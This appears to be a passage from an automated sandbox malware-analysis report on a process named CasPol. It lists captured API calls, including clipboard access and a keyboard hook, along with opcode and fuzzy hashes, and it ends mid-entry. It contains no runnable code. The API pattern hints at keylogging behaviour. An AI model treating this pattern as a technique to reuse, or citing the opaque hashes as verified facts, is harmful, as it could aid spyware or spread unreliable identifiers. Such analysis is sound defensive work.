                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard
                                                                                      • String ID:
                                                                                      • API String ID: 220874293-0
                                                                                      • Opcode ID: 3ca4ed22692ba3bd9f34125335c75c65e0d6e2b20bf1cab14f70a9a8fc69fa1b
                                                                                      • Instruction ID: 8047109370df0a896e08a4f3dfbf53f192fae5efb20d00b9c73505f5188a5d94
                                                                                      • Opcode Fuzzy Hash: 3ca4ed22692ba3bd9f34125335c75c65e0d6e2b20bf1cab14f70a9a8fc69fa1b
                                                                                      • Instruction Fuzzy Hash: DD3132B0905258DFDB11CFA8C984BDEBBF1EF48304F248069E548BB391C7B5A945CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard
                                                                                      • String ID:
                                                                                      • API String ID: 220874293-0
                                                                                      • Opcode ID: 3a048053aee685a3e7790946c8e4a3d68c84b94a9d21d9f46d2497c729ad3de1
                                                                                      • Instruction ID: 2a7463045a35f9ff82702d82c3887f57b3f8b9c2ad110915458d102c382ebef7
                                                                                      • Opcode Fuzzy Hash: 3a048053aee685a3e7790946c8e4a3d68c84b94a9d21d9f46d2497c729ad3de1
                                                                                      • Instruction Fuzzy Hash: 6E3101B090124CDFDB10DF99C984B8EBBF1EF48314F248069E608BB391DBB56945CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,2089A766,?,?,?,?,?), ref: 2089A827
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 63940004bf7b8060d0296d0915e83f99162900abd2e2aaea722ab5276cc298f6
                                                                                      • Instruction ID: 85c4febf249767a2808624a4a4045e07ed98f1d866b441d7725525fb132d11ce
                                                                                      • Opcode Fuzzy Hash: 63940004bf7b8060d0296d0915e83f99162900abd2e2aaea722ab5276cc298f6
                                                                                      • Instruction Fuzzy Hash: B621E5B5900248EFDB10CF99D984AEEBBF4EB48310F14842AE958B7311D374A955CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,2089A766,?,?,?,?,?), ref: 2089A827
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 9ecf4fcfb93bccffbb6e5253d3e013a6e3529ddd9c9f6b7face69dfb5a57890c
                                                                                      • Instruction ID: 7bea074d01aba905291057711e98ef1c3e41104ce02a7338cc9ff296834a5cd8
                                                                                      • Opcode Fuzzy Hash: 9ecf4fcfb93bccffbb6e5253d3e013a6e3529ddd9c9f6b7face69dfb5a57890c
                                                                                      • Instruction Fuzzy Hash: FD21F2B5900248AFCB10CFA9D884AEEBFF4EB48314F14842AE954A7351C378A945CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 2089E53B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: ae60c5f5a1c2168885d25120083b310bc3b4cd8ee460999db3ceb6847d9d0c6e
                                                                                      • Instruction ID: 61215d4fdb45db64a602bc2dd1e1eaad2719164867f4c4be99e163168e0873c5
                                                                                      • Opcode Fuzzy Hash: ae60c5f5a1c2168885d25120083b310bc3b4cd8ee460999db3ceb6847d9d0c6e
                                                                                      • Instruction Fuzzy Hash: D02132B5D042489FCB10DFA9C944BEEBBF1AF88314F10842AD459A7350C7B4A945CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 20891AEF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: a9b580dd79241b4b44622a598837556880644ac2a24417b3a6032a95814ec078
                                                                                      • Instruction ID: 70f2e9551f8de456bfa8b85d843bb79f54986f396feecd690626e5fda387d35c
                                                                                      • Opcode Fuzzy Hash: a9b580dd79241b4b44622a598837556880644ac2a24417b3a6032a95814ec078
                                                                                      • Instruction Fuzzy Hash: 0A1133B1D042599FCB00DFA9D444BEEFBF0AF88310F11822AD858B7240D378A945CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 20891AEF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: 735c7a62d834dd6df2b74e346e1fb09c5a9844b85f5d29636fe4ab0e57792be9
                                                                                      • Instruction ID: 105168e2ad0a7adf2f6ac5ccb9e3415390b49ef4229929c8d14f0c051095d84f
                                                                                      • Opcode Fuzzy Hash: 735c7a62d834dd6df2b74e346e1fb09c5a9844b85f5d29636fe4ab0e57792be9
                                                                                      • Instruction Fuzzy Hash: 7A1112B1C042599BCB00DF9AC444BAEFBF4AF48224F01812AD918B7240E778A945CFE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 20895716
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: fc468edeff123f681637f065cc713443d3b6232916744e00416590a426b28a4f
                                                                                      • Instruction ID: 39c78b2a7a35b581b98b69d874da0a3be4ff5d99a569571b88bce6e2ad63c4f3
                                                                                      • Opcode Fuzzy Hash: fc468edeff123f681637f065cc713443d3b6232916744e00416590a426b28a4f
                                                                                      • Instruction Fuzzy Hash: 3A11ECB5D00249DFCB10DF9AC444A9EBBF4EB89224F10852AD969B7600D378AA45CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,2089BA4F), ref: 2089BAE7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 67b8662a111844c6ffc15ee860ff19dba30405a94a07599a1815cd51c1f0270f
                                                                                      • Instruction ID: 1d6b44062e8ef0f1d9cefeda613365b8c83ef1c6de8e74c59782dced5bdc58b6
                                                                                      • Opcode Fuzzy Hash: 67b8662a111844c6ffc15ee860ff19dba30405a94a07599a1815cd51c1f0270f
                                                                                      • Instruction Fuzzy Hash: 641113B0904249CFCB10DF9AD948B9EBBF4EB88224F10842AD559A7300D774A944CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 2089C46D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: ee36398b9fd8f787ba658a8b914131b6faf88b6e1aec38224408441c69688b17
                                                                                      • Instruction ID: b6060d6e432f924b3620d29ecf13d9c2422bb83b5af02ded0238c6ccd6f411cb
                                                                                      • Opcode Fuzzy Hash: ee36398b9fd8f787ba658a8b914131b6faf88b6e1aec38224408441c69688b17
                                                                                      • Instruction Fuzzy Hash: B21133B1904348CFCB10DFA9D444BDEBBF4EB48324F208419D658A7701D379A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 2089C46D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: 44dee830da4e7a204d946998b0e8511f718db11893ce22348e882a6343a04059
                                                                                      • Instruction ID: b1305f3f8c15f2d7a1ba745b87fc49fd4592d03142ff0ecb1fa54db136520d46
                                                                                      • Opcode Fuzzy Hash: 44dee830da4e7a204d946998b0e8511f718db11893ce22348e882a6343a04059
                                                                                      • Instruction Fuzzy Hash: E51133B5904249CFCB10DFA9D488BDEBBF0EB48314F108529D558A7341C378AA49CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 20895716
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: aa6b392ec04d0d04c9a3ff2641f7b0d483262f88bb9ec9b1f8fa8ed3c2046564
                                                                                      • Instruction ID: f3e5d0ba1491dcd7f58e8090322a437c5cee080414d927a1758b895978cb5e92
                                                                                      • Opcode Fuzzy Hash: aa6b392ec04d0d04c9a3ff2641f7b0d483262f88bb9ec9b1f8fa8ed3c2046564
                                                                                      • Instruction Fuzzy Hash: DB11F0B5D00249CFCB10DFAAC444ADEFBF5EF89214F10852ED869A7600C375A545CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,2089BA4F), ref: 2089BAE7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 5db3f74780b669721e87376b16e5ba30a43bfd86da49d6de8dfe7043fec0c5c6
                                                                                      • Instruction ID: 4da387e5132ed25fda5e80046b95a75a93bc328c51dbf63055a15289f9a3ebd6
                                                                                      • Opcode Fuzzy Hash: 5db3f74780b669721e87376b16e5ba30a43bfd86da49d6de8dfe7043fec0c5c6
                                                                                      • Instruction Fuzzy Hash: 281110B5900249CFCB10DF9AC988BDFBBF4EF88214F10842AD558A7650C778A944CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 2089C46D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: 35461dd8eb8b52b7c971108318b02921ff6322ec6e0f56ed5f30a3143b6f48c9
                                                                                      • Instruction ID: bea8b4ef01ed02148d1255faaca0e5e55aefaf26b0a81769a1dc119e18e37b68
                                                                                      • Opcode Fuzzy Hash: 35461dd8eb8b52b7c971108318b02921ff6322ec6e0f56ed5f30a3143b6f48c9
                                                                                      • Instruction Fuzzy Hash: 981115B0904348CFCB10DF99D544B9EBBF4EB48324F108419E698B7701D379A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'k
                                                                                      • API String ID: 0-2531104618
                                                                                      • Opcode ID: f393b89ba1f68cf2f1faab7d22b868606eca1ff2dde75e616f46f3322d8d6349
                                                                                      • Instruction ID: e5b62e75f243f1738c1244fdff817061e0c28aaf45972bbcb0db276ef4cefb2e
                                                                                      • Opcode Fuzzy Hash: f393b89ba1f68cf2f1faab7d22b868606eca1ff2dde75e616f46f3322d8d6349
                                                                                      • Instruction Fuzzy Hash: EE414574600129DFCB048F69D888AAA7BB9FB48315F104169F916CB3A0DB75EE51CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Hk
                                                                                      • API String ID: 0-2725002668
                                                                                      • Opcode ID: ebb3158e920d65222ed2206d800d3775c6efb7834c53dd2dcd168b468b687b0d
                                                                                      • Instruction ID: ecf84df853b4d91d2f97955389ae566e334befce3d78c7870b4895b2e4e22e41
                                                                                      • Opcode Fuzzy Hash: ebb3158e920d65222ed2206d800d3775c6efb7834c53dd2dcd168b468b687b0d
                                                                                      • Instruction Fuzzy Hash: 4231E9743042919FD7068F24E994AAF7FE7FF89251B058069F94ACB252CB39EC11C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHk
                                                                                      • API String ID: 0-517618362
                                                                                      • Opcode ID: 8e2b2394909c2a5bf9333bb4ce23733dc81c6303ae7e8678988aae13f382d6dc
                                                                                      • Instruction ID: 7c9aad707e968510fc54e9f0294c7b66459226308ae5f6432d42c9cd9e800364
                                                                                      • Opcode Fuzzy Hash: 8e2b2394909c2a5bf9333bb4ce23733dc81c6303ae7e8678988aae13f382d6dc
                                                                                      • Instruction Fuzzy Hash: 07311074B006648FCB089F78C4996AFBBF6EFC9244B118468C506DB794EF349C45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHk
                                                                                      • API String ID: 0-517618362
                                                                                      • Opcode ID: 01ba55cff98b10f69071cc5c8e53b828e60ea0a161fc99f727e9eeb267f071c9
                                                                                      • Instruction ID: a48af6e9c5758e262339f6b11c05c619ff4675b652dcc981b4516ad192f3879a
                                                                                      • Opcode Fuzzy Hash: 01ba55cff98b10f69071cc5c8e53b828e60ea0a161fc99f727e9eeb267f071c9
                                                                                      • Instruction Fuzzy Hash: 7B310174B002648FDB089F78C0986AFBBF6AFC9284B118438C506DB798DF349C45CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'k
                                                                                      • API String ID: 0-2531104618
                                                                                      • Opcode ID: 99387a6b357f0e2968c1c4d87e2fd6c7c458d25294dc37359058651b5b3102c5
                                                                                      • Instruction ID: ed1a7d8568db8acce44ad7fb6881c7963923b65fe3c66a1654222b7324ff532a
                                                                                      • Opcode Fuzzy Hash: 99387a6b357f0e2968c1c4d87e2fd6c7c458d25294dc37359058651b5b3102c5
                                                                                      • Instruction Fuzzy Hash: C921F970B04199DBD714CE35E884AEB7BE9EB85311F018126E911C7654EB39DE51C760
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f8155cce3aab60d647efa5c1dd7bc8a69d2396c3c11d4a565d6ff084273cc2f
                                                                                      • Instruction ID: 10cbd65ec6a01e008d97db976623556fc304c6a0ce79b10aec394ca87187d174
                                                                                      • Opcode Fuzzy Hash: 1f8155cce3aab60d647efa5c1dd7bc8a69d2396c3c11d4a565d6ff084273cc2f
                                                                                      • Instruction Fuzzy Hash: E9229C74E042589FCB04DFB8D988A9EBBB2FF88314F108565D809EB354EB35AD46CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4724a8e7e8c316bae87a371920c4f215e70bc0469885ae83480edbdeb9a0ea4f
                                                                                      • Instruction ID: 4880844692a539a85eb10b7566bfa9afdb18479cb242a72c73c54944b3b410cf
                                                                                      • Opcode Fuzzy Hash: 4724a8e7e8c316bae87a371920c4f215e70bc0469885ae83480edbdeb9a0ea4f
                                                                                      • Instruction Fuzzy Hash: 16D1EA34B0C7C69FD3029734EC696A63BE69B96305F5680B7D648CF793EA24DC0A8711
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 873874322d8112dea7a9faca124bba63f6379e2850c296a1067cb30e88e85171
                                                                                      • Instruction ID: 4507393f322b31c6e631818915e4696967ae51d8b801033feb4ac4b583700443
                                                                                      • Opcode Fuzzy Hash: 873874322d8112dea7a9faca124bba63f6379e2850c296a1067cb30e88e85171
                                                                                      • Instruction Fuzzy Hash: FDD1D7B6A006148FCB04CFA9D584D9EB7F6FF89314B1681A9E519AB362DB31FC41CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d15ca0ed0f42d14951fb8b51f7f0baf350f342796afb75c558005fc50861bbb2
                                                                                      • Instruction ID: 14965be2cc1ac135c7272bdd30a3b78d89adb0532ed4040869a893033460bd5c
                                                                                      • Opcode Fuzzy Hash: d15ca0ed0f42d14951fb8b51f7f0baf350f342796afb75c558005fc50861bbb2
                                                                                      • Instruction Fuzzy Hash: 25C1C6B1E006158FCB04CFA9D584D9EBBB2FF89315B168199E519AB362D731FC41CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1ab849b2777a8b4aec5b72bff7b36c34f6ee15d2158047c18c310e6471a376a6
                                                                                      • Instruction ID: 339a2877cbddd9e256cb66ff346a29c2665a329f8580107c4ce0b381d6b31e1a
                                                                                      • Opcode Fuzzy Hash: 1ab849b2777a8b4aec5b72bff7b36c34f6ee15d2158047c18c310e6471a376a6
                                                                                      • Instruction Fuzzy Hash: 89812130B043198FCB059B75D49869E37E2BFC9204F558839D906CB786EF39ED4A8B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27de4e6abab3903b0ebbc90b41b2115305680bfd0e505faa10c287f25e7c0d65
                                                                                      • Instruction ID: 64aa64e990ab0f82cfbc86935bb9294fbb18efb0eb793186d87cda0d275bdea3
                                                                                      • Opcode Fuzzy Hash: 27de4e6abab3903b0ebbc90b41b2115305680bfd0e505faa10c287f25e7c0d65
                                                                                      • Instruction Fuzzy Hash: 4391C030B00329DFCB04EFB5D5945AE77B2BFC8214B118828D806D7790EF35A94A8B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 605c878a2d7adc24ef15180c883f1859b0955c72a44a2a1bc2b2c8c7c24e8ed8
                                                                                      • Instruction ID: d1628d7aea358526eadc9cdcd41f2805c7ab8068619383536fdf067715c54728
                                                                                      • Opcode Fuzzy Hash: 605c878a2d7adc24ef15180c883f1859b0955c72a44a2a1bc2b2c8c7c24e8ed8
                                                                                      • Instruction Fuzzy Hash: 14819CB5A042558FCB00CF69D884E9EBBF6FF44310B0685AAE8599B362D731FC41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9938507b6e9f16028651b11c4331886d76f5d81a21d036f4c6ad62b8f7334a57
                                                                                      • Instruction ID: 9a33e68f47466c1084ec0c22d4ca8cf9019771257cf301c0f4a5226c32a2b609
                                                                                      • Opcode Fuzzy Hash: 9938507b6e9f16028651b11c4331886d76f5d81a21d036f4c6ad62b8f7334a57
                                                                                      • Instruction Fuzzy Hash: AE91BD74E04259CBCB04EFB4D99858EB7B2BF88314F618529D901EB350EF35AD06CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 362fa03f06644ed5bf668f8e4f423d87c5b32a868d66f751ebf8d434effc7031
                                                                                      • Instruction ID: befffa47201b4f58772ec3b9d68154f803d98190d7229cfd1022f77c398ca14c
                                                                                      • Opcode Fuzzy Hash: 362fa03f06644ed5bf668f8e4f423d87c5b32a868d66f751ebf8d434effc7031
                                                                                      • Instruction Fuzzy Hash: A6711F347042218FD7099B78D89466FB7A2EFC8254B058578EA0ACB395CF79EC42C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ea142b8e1e79b3ede7851ce4bc79b507c570a3a717b4bf4a9a430047cde3d634
                                                                                      • Instruction ID: f02360a1cae9ec0fb18978d3867155f3aeb1474fc0ce77cf148d2d6c87d12343
                                                                                      • Opcode Fuzzy Hash: ea142b8e1e79b3ede7851ce4bc79b507c570a3a717b4bf4a9a430047cde3d634
                                                                                      • Instruction Fuzzy Hash: 4451B231714115CFC704DF39E884AAB7BE9FF4921530641AAE916CB772EB29ED01CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
